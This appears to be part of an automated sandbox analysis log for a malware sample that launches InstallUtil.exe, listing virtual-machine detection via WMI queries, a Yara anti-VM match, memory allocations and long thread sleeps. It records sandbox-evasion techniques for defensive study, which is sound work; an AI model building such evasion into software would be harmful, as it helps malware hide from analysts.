Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: umVoLahqZn.exe PID: 5812, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: 1530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: 33E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: 3130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: 86F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: 96F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: 98B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: A8B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: AC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: BC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory allocated: CC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 1960000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594966	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594750	Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Window / User API: threadDelayed 7872	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Window / User API: threadDelayed 1952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 8420	Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe TID: 6200	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe TID: 6200	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3924	Thread sleep count: 1435 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3924	Thread sleep count: 8420 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -596766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -594966s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024	Thread sleep time: -594750s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597984	Jump to behavior
